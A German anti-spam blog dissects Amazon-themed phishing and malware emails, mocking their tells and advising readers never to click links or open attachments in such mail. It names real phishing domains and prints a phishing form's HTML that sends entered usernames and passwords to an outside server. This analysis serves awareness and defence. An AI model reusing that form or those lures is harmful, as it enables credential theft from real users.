[Der überlagerte rote Schriftzug ist von mir, denn ich werde nicht gern Bildhoster für Spammer – aber die JPEG-Artefakte im Klickeknöpfchen sind original. Ich habe ein ursprünglich verlustfreies Format nach Bearbeitung verlustfrei wieder gespeichert. Man hat doch bei aller Stabilität der Betrugsmaschen jeden Woche etwas Neues in der Spam. Zum Beispiel verlustfreie PNGs mit JPEG-Artefakten.]

Was von einem Versuch, den „rechtmäßigen Besitzer zu identifizieren“ zu halten ist, der darin besteht, dass man alle längst bei Amazon bekannten Daten noch einmal eingibt, kann sich jeder durch eine Minute Nachdenken herleiten: Jemand, der sich das Amazon-Konto wirklich unterm Nagel gerissen hat, könnte sich alle diese Daten anschauen und sie sogar verändern. Aber für eine Betrügerbande werden die eingegebenen Daten sehr interessant sein.

Die gesamte Grafik ist ein Link. Dieser führt nicht etwa zur Website von Amazon…

$ location-cascade http://epl-digitalrefferycommunications2019.online/5P7BMBQYBD90N9MSOB96C7V5P8HZJQ6W1LUR0D7M7COOP
302	http://epl-digitalrefferycommunications2019.online/5P7BMBQYBD90N9MSOB96C7V5P8HZJQ6W1LUR0D7M7COOP
Found	https://amazon.de.kundenkonto-sicherheitsverifizierung.info
$ _

…sondern auf den „Sicherheitsserver“ einer Betrügerbande, der völlig sicher stellt, dass die Daten nicht an Amazon, sondern an die Betrügerbande gehen. Nach nur einer einzigen Weiterleitung – das ist für gegenwärtige Verhältnisse wenig – landet man in der Website in einer Subdomain der Domain kundenkonto (strich) sicherheitsverifizierung (punkt) info, die…

$ whois kundenkonto-sicherheitsverifizierung.info | grep '^Creation'
Creation Date: 2017-01-13T19:52:11Z
$ whois kundenkonto-sicherheitsverifizierung.info | grep '^Registrant' | head -5
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
$ _

…vor 13 Tagen jemand über einen Dienstleister aus dem sonnigen Panama anonym registriert hat. Zusammem mit der Subdomain amazon.de dieser ansonsten sehr unhandlich benannten Domain soll für diese Phishing-Kampagne der Eindruck erweckt werden, es handele sich um eine Domain von Amazon.

Wer dort Daten eingegeben hat, hat ein Problem, denn diese Daten sind jetzt in den Händen von Kriminellen. Wenn Kreditkartendaten eingegeben wurden, sollte die Karte sofort gesperrt werden, um den Schaden klein zu halten. Natürlich ist auch das Amazon-Konto kompromittiert und wird vermutlich schon für betrügerische Geschäfte unter Missbrauch der Identität eines anderen Menschen verwendet, so dass auch Amazon so schnell wie möglich von der Sache unterrichtet werden sollte.

Und dabei gibt es gegen Phishing einen ganz einfachen Schutz. Der besteht allerdings nicht in einer Schlangenöl-Software oder einem auf dem Computer gemalten Heiligenbildchen, sondern in einer Gewohnheit, die man sich recht einfach angewöhnen kann: Niemals in eine E-Mail klicken, weil eine E-Mail eines Unternehmens dazu auffordert, sondern immer die Startseite desjenigen Unternehmens im Browser aufrufen, das einem zum Vorbeischauen auffordert. Die Webbrowser haben dafür seit Mosaic Netscape 0.95 beta aus dem Jahr 1994 sehr praktische Lesezeichenfunktionen, die es einem sehr erleichtern können, sich diese Angewohnheit anzugewöhnen. (In früheren Webbrowsern wie etwa dem vorher sehr populären NCSA Mosaic musste man dafür noch eine HTML-Datei im Editor bearbeiten.)

Wenn man sich auf der garantiert richtigen Seite eingeloggt hat und dort feststellt, dass man trotz der erschröcklichen Mails von eingeschränkten oder gesperrten Accounts keinerlei Probleme bei der Nutzung hat und auch keine Hinweise angezeigt bekommt, dass man handeln muss, hat man übrigens einen Phishing-Versuch erfolgreich abgewehrt. Das war einfach und hat sehr viel mit Ärger verschwendete Lebenszeit eingespart.

Bitte, tut das einfach! 😉

Diese Spam ist ein Zustecksel meines Lesers S. S.

Vorname Nachname Ihre Abrechnung 60600263 vom 26.04.2016

Dienstag, 26. April 2016

Diese Spams sind die Pest des heutigen Tages. Es gibt unglaublich viel davon.

Anstelle von „Vorname Nachname“ stand hier der richtige bürgerliche Name des Empfängers. Den hätte der Spammer zwar auch in das Empfängerfeld schreiben können, aber in der Betreffzeile wirkt es nun einmal alarmierender, und alarmieren will dieser Spammer. Denn er hat frische Schadsoftware anzubieten, die man sich nach einer Überrumpelung installieren soll, indem man einen Mailanhang öffnet.

Von: Rechnungsstelle Amazon AG <ebay (at) ebay (punkt) de>

So so, eBay und Amazon sind neuerdings fusioniert… schade eigentlich, dass die das selbst noch gar nicht gemerkt haben.

Der Spammer will hier natürlich die Kunden zweier beliebter Websites erreichen und zur Installation von Schadsoftware motivieren – aber die Art, wie er es getan hat, ist so, als würde in einer Absenderadresse als Klarname „etwas bei Volkswagen“ angegeben, und dazu eine Mailadresse in der BMW-Domain. Wenn man so etwas sieht, kann man sofort Zuckungen im Löschfinger bekommen. Es handelt sich ganz sicher um eine Spam von Kriminellen, deren Absender gefälscht ist.

Es gibt genau die gleiche Masche (mit geringfügigen Änderungen, aber ebenfalls mit dem Merkmal der erwähnten Anschrift) auch als angebliche Mail mit dem Absender „Rechtsanwalt GiroPay AG“ und der gefälschten Absenderadresse service (at) giropay (punkt) de und vermutlich in einigen weiteren Geschmacksrichtungen mehr.

Sehr geehrte(r) Vorname Nachname,

leider haben wir festgestellt, dass unsere Zahlungsaufforderung NR606002630 bisher ergebnislos blieb. Heute gewähren wir Ihnen nun letztmalig die Möglichkeit, den nicht gedeckten Betrag der Firma Amazon AG zu begleichen.

Ganz schlimme Zahlungsaufforderung. Sie hat eine Nummer. Denn Nummern sind wichtig. Um was geht es? Steht da nicht. Von wann ist sie? Steht da nicht. Objektiv steht da gar nichts und man soll völlig grundlos Geld bezahlen – wenn man mal von dem kleinen Patzer des Autors absieht, dass man „nicht gedeckte Beträge von Amazon begleichen“ kann. Schön, dass man seinen Beitrag dazu leisten darf, Amazon vor der Insolvenz zu bewahren.

Niemand würde sich so unklar ausdrücken, wenn es um Geld geht.

Nachdem so wenig Konkretes gesagt wurde, hat der Spammer allerdings auch etwas Konkreteres mitzuteilen – auch wenn der Empfänger das schon längst kennt:

Verbindliche Personalien:

Vorname Nachname
Straße Hausnummer
Postleitzahl Wohnort

Tel. Telefonnummer

Hier steht im Original der Name und die korrekte Anschrift des Empfängers nebst seiner korrekten Telefonnummer. Ich habe zurzeit mehrere derartiger Spams von Lesern, die allesamt eine korrekte Anschrift und eine korrekte Telefonnummer enthalten. Wo die Daten herkommen, ist mir zurzeit unklar – aber Spammer sind seit mehreren Jahren darum bemüht, auf allen nur denkbaren Wegen zu möglichst vielen Mailadressen weitere Daten zu erhalten und in großen Datenbanken zusammenzuführen. Meine spontane Vermutung ist, dass diese Daten über trojanische Apps aus Smartphone-Adressbüchern abgegriffen werden. In einem Fall war die angegebene Telefonnummer seit mindestens einem Jahr nicht mehr aktuell (das Mobiltelefon ging verloren). Der Datenbestand, aus dem sich die Spammer bedienen, scheint also mindestens ein Jahr alt zu sein. Allerdings sind auch viele Adressbücher in Smartphones nicht die Aktuellsten. Näheres dazu kann ich aber erst sagen, wenn mir ein paar Fälle bekannt sind, in denen die Quelle der Daten völlig klar ist, weil zum Beispiel eine ganz spezifische, nur in einem Kontext verwendete E-Mail-Adresse vom Spammer verwendet wurde, so dass man der Sache auf die Spur kommen kann.

Wer hierzu weitere Hinweise geben möchte, kann einfach einen Hinweis in den Kommentaren geben, so dass alle Leser etwas davon haben. Ich gehe davon aus, dass Millionen von diesen Spams unterwegs sind – und ich selbst habe „leider“ nur eine nicht-personalisierte mit der gleichen Schadsoftware-Brut. (Wer nach einer solchen Spam zu Recht etwas paranoid geworden ist: Natürlich kann man sich hier einfach einen Namen und eine Mailadresse für den Kommentar ausdenken, eine Registrierung ist nicht erforderlich.)

Das ist ein gutes Beispiel dafür, warum Datenschutz wichtig ist. Eine ansonsten ganz durchschnittliche Schadsoftware-Spam wird ungleich gefährlicher, wenn sie mit solchen Daten personalisiert wurde.

Aufgrund des andauernden Zahlungsverzug sind Sie verpflichtet dabei, die durch unsere Inanspruchnahme entstandene Gebühren von 44,40 Euro zu bezahlen. Bei Fragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von drei Werktagen. Um weitete Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Konto zu überweisen. Berücksichtigt wurden alle Zahlungseingänge bis zum 25.04.2016.

So so, Kontaktaufnahme in drei Tagen – und eine Kontaktmöglichkeit ist nicht angegeben. Dafür wird es richtig teuer. Wofür, wird nicht gesagt. Sind halt Gebühren. Die entstehen halt. Wisst schon. Wer erschrocken ist und von seiner leichten Panik verdummt etwas Näheres erfahren möchte…

Eine vollständige Kostenaufstellung Nr. 606002630, der Sie alle Positionen entnehmen können, fügen wir bei.

…muss einen Anhang einer E-Mail öffnen, die mit gefälschtem Absender einen falschen Eindruck erwecken will, um rauszukriegen, um was zum hackenden Henker es hier überhaupt geht.

In den mir vorliegenden E-Mails ist dieser Anhang ein ZIP-Archiv, in dem ein ZIP-Archiv liegt, in dem eine ausführbare Datei für Microsoft Windows liegt. In einem Exemplar gibt es keine doppelte Verpackung, sondern nur eine einfache. In keinem Fall handelt es sich um ein Dokument, auch wenn das Piktogramm einen falschen Eindruck vom Charakter der Datei erwecken will.

Es handelt sich völlig klar um Schadsoftware. Diese wird zurzeit von den meisten Antivirus-Programmen nicht als Schadsoftware erkannt. Wer sich auf diesen Schutz verlassen hat, ist verlassen. So genannte Antivirus-Programme funktionieren nämlich nicht. Und wenn man sich wegen dieser Programme sicher fühlt und deshalb glaubt, unüberlegt handeln zu dürfen, sind diese Programme sogar gefährlich und arbeiten der Organisierten Kriminalität zu.

Deshalb ist es wichtig, dass man derartige Spam selbst erkennt und niemals darin herumklickt, sondern sie löscht. (Wer mag, kann natürlich gern zur Polizei gehen und Strafanzeige erstatten, aber über die Ermittlungschancen sollte man sich keine Illusionen machen.) Grundsätzlich sollte niemals ein E-Mail-Anhang geöffnet werden, der nicht vorher explizit und über einen anderen Kanal als E-Mail abgesprochen wurde – und niemand sollte sich vom Absender einer Mail verblenden lassen, denn dieser ist beliebig fälschbar¹.

Wir erwarten die Zahlung bis zum 28.04.2016 auf unser Bankkonto. Falls wir bis zum genannten Termin keine Überweisung einsehen, sehen wir uns gezwungen Ihre Forderung an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten werden Sie tragen.

Jedes Unternehmen, das auch Geld bekommen möchte, würde an dieser Stelle seine Bankverbindung und den Betrag angeben. Der Spammer will aber nur, dass ein Anhang geöffnet wird.

Sollten Sie den Rechnungsbetrag bereits vorab an uns gezahlt haben, ist dieses Schreiben nur für Ihre Unterlagen bestimmt. Sollten Sie Fragen haben, stehen wir Ihnen gerne zur Verfügung.

Klar, eine E-Mail nur für meine Unterlagen… 😀

Und die Fragen stellt man wo? Ach, Kontaktdaten gibts keine.

Mit freundlichen Grüßen

Rechnungsstelle Silas Krantz

„Freundlich“ wie eine Ohrfeige

Dein Schadsoftware-Spammer mit dem aktuellen Erpressungstrojaner

¹Die ganzen Internet-Unternehmen könnten damit anfangen, ihre Mail digital zu signieren, um dieser Form der Kriminalität (und dem Phishing) nach und nach das Wasser abzugraben. Sie tun dies nicht. Die technische Lösung für die digitale Signatur von E-Mail steht seit 25 Jahren jedem zur Verfügung, der sie nutzen möchte. Sie tun dies trotzdem nicht. Die technische Lösung steht seit über anderthalb Jahrzehnten in freier und kostenlos nutzbarer Form jedem zur Verfügung, der sie nutzen möchte. Sie tun dies trotzdem nicht. Die ganzen Unternehmen, die sich angesichts der gegenwärtigen Kriminalität aus nicht nachvollziehbaren Gründen (ich nenne sie einfach mal in Ermangelung besserer Erklärungen Verantwortungslosigkeit und Arschlochhaftigkeit) weigern, ihre Kunden zu schützen, indem sie den Verfasser und unverfälschten Inhalt ihrer E-Mails überprüfbar sicherstellen, tragen eine erhebliche Mitschuld am Erfolg der gegenwärtigen Internet-Kriminalität, vom Phishing bis zum Erpressungstrojaner.

Danke an die diversen Einsender dieser wirklich gefährlichen Spam! Ein spezieller Dank geht an Hans.

Ihr Amazon-Konto wurde ausgesetzt

Mittwoch, 23. März 2016

Und ich habe doch gar keines… 😉

Von: amazon (punkt) powering (at) msg (punkt) afterbuy (punkt) de
An: gammelfleisch (at) tamagothi (punkt) de

Diese Spam geht an alle möglichen aus dem Internet eingesammelten Adressen, und der Spammer fälscht zwar den Absender, ist aber zu doof dazu, es so zu machen, dass der Absender auch wirklich nach Amazon aussieht. Aber zum Ausgleich…

Hallo von Amazon-Sicherheit,

…sieht die Anrede auch nicht ganz so überzeugend aus. 😀

Hier ist eine wichtige Nachricht von Amazon.de. Bitte lesen Sie diese Nachricht sorgfaeltig durch, da sie Ihr Kundenkonto bei Amazon.de betrifft.

Wir ueberpruefen routinemaessig Kundenkonten. Bei der Pruefung Ihres Kundenkontos erhaertete sich leider unser Verdacht, dass ein Unberechtigter Zugriff auf dieses hatte.

Aus diesem Grund haben wir Ihr Kundenkonto voruebergehend gesperrt. Niemand kann derzeit auf Ihr Kundenkonto zugreifen, Sie eingeschlossen.

Oh, wie bitter! Amazon nimmt jetzt wohl auf seiner Website über eine noch völlig unbekannte Schnittstelle den Besuchern Fingerabdrücke ab, und wenn jemand das richtige Passwort eingibt, aber den falschen Fingerabdruck hat, dann wird einfach der Account gesperrt. Und es gibt nur eine einzige Möglichkeit, was man dagegen tun kann:

Um Ihr Kundenkonto zu entsperren, befestigt auf diesem E-Mail [sic!] sie haben das Formular.

Bitte laden Sie das Formular und geben Sie Ihre Daten.

Man muss den Anhang einer E-Mail öffnen, die von Unbekannten mit gefälschtem Absender und voller falscher Behauptungen in recht fragwürdigem Deutsch versendet wurde. Auch, wenn da diesmal keine Schadsoftware dranhängt¹, sondern nur ein krimineller Versuch, an die Passwörter anderer Leute zu kommen, ist das Öffnen von unverabredeten Anhängen in E-Mails immer eine ganz schlechte Idee.

Übrigens sieht das Formular im angehängten HTML-Dokument – was nach der stümperhaft formulierten Phishing-Spam gar nicht zu erwarten war – recht gut aus:

Das gesamte Design besteht nicht etwa aus Texten, sondern ist ein großes Bild, das bei einem anonym nutzbaren, kostenlosen Bildupload-Dienst hinterlegt wurde. Natürlich habe ich directupload (punkt) net schon mit einer Mail darauf hingewiesen, dass der Dienst von Spammern missbraucht wird und erwarte deshalb eine baldige Löschung dieses Blendwerkes. Leider ist das nur ein Tropfen auf dem heißen Stein; ein neues Bild ist schnell hochgeladen und ein paar Millionen Spams sind schnell versendet, der Schaden wird schnell seine naiven Opfer auf anderem Wege finden. 🙁

Was auch immer man in diesem angehängten HTML-Dokument eingibt, geht nicht etwa zu Amazon, sondern…

<form method="post"
action="http://www.desentupidoraapolinario.com.br/zmd/404.php">
<input
style="top: -83px; height: 17px; left: -949px; width: 223px;"
id="user" name="user" value="" type="text" required/>
<input style="top: -99px; height: 17px; left: -949px; width: 223px;"
id="pass" name="pass" value="" type="password" required/><input
style="top: -123px; height: 20px; left: -890px; width: 165px;"
id="submit" name="submit" value="" type="submit">
</form>

…wird an eine deutlich weniger Vertrauen erweckende Domain gesendet. Aber das ist ja auch gar keine Überraschung, denn es handelt sich um eine Spam.

Und nein: Es kann nicht dazu kommen, dass eine ähnliche Mail einmal „echt“ ist. Solche E-Mails sind immer Phishing-Versuche. Amazon versendet keine E-Mail mit Anhängen, in denen Formulare liegen, in denen der Empfänger sein Passwort eingeben soll, und übrigens auch keine mit Links auf derartige Formulare. Und genau das Gleiche gilt für jeden anderen Anbieter von Webdiensten. Und natürlich auch für jede Bank. Und einfach nur generell. Die einzigen Menschen, die so etwas machen, sind Kriminelle.

Es ist also gar nicht so schwierig, nicht darauf hereinzufallen.

Selbst, wenn man sich einmal unsicher ist, sollte eine E-Mail niemals ein Grund zu panischem Geklicke werden, denn Kriminelle verstehen sich darauf, Menschen zu überrumpeln. Sie leben schließlich davon, dass ihre fiesen Tricks zumindest manchmal funktionieren. Immer vor dem Klick nachdenken. Und im Zweifelsfall einfach rückfragen.

Sobald Sie dies tun, werden Sie Ihr Konto wieder verwenden, um Produkte auf Amazon Europa zu verkaufen!

Freundliche Muller,
Das Amazon Services Team

Freundliche was?

Wenn Sie solche E-Mails nicht mehr erhalten mцchten, kцnnen Sie sich hier abmelden.

Ist ja schon ein bisschen peinlich, wenn man dabei den Link vergisst, nicht?

Aber der Kriminelle hat seine eigentliche „Botschaft“ ja rübergebracht, und jetzt ist er mit seinen Gedanken schon wieder bei den Nutten, so dass die Sorgfalt für eher formale, unwichtige Dinge eben nachlässt. Wenn man darauf achtet, kann man derartige Fehler in sehr vielen Spams sehen. Wenn sich der Spammer Mühe geben wollte, könnte er ja gleich arbeiten gehen.

© 2016 Amazon.com Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten. Amazon Services Europe S.а r.l. 5 Rue Plaetis L-2338 Luxembourg, Handelsregisternummer Luxemburg: B-93815, Gesellschaftskapital 37.500 EUR, Gewerbelizenznummer: 100416, USt.-Identifikationsnummer Luxemburg: LU 19647148.

Nein, diese Spam wurde von einer dynamischen IP-Adresse eines Kunden bei einem Telekommunikationsanbieter aus Arizona, USA versendet; mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen mit Schadsoftware feindselig übernommenen Rechner, der Teil eines Botnetzes ist. Diese Spam hat niemals einen Server von Amazon gesehen.

Einmal ganz davon abgesehen, dass beanspruchtes „geistiges Eigentum“ für eine automatisch erstellte E-Mail ein geistiger Dünnpfiff ist, auf den kaum noch eine Satire möglich ist. Aber das machen leider nicht nur Spammer, sondern auch andere Idioten.

¹Ich weiß, das hier keine Schadsoftware enthalten ist, weil ich mir den Quelltext des angehängten HTML-Dokumentes angeschaut habe. Es gibt keine andere Möglichkeit, das herauszubekommen. Ein Antivirus-Programm versagt regelmäßig, wenn es mit den neuesten Entwicklungen der Kriminellen konfrontiert ist.

Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.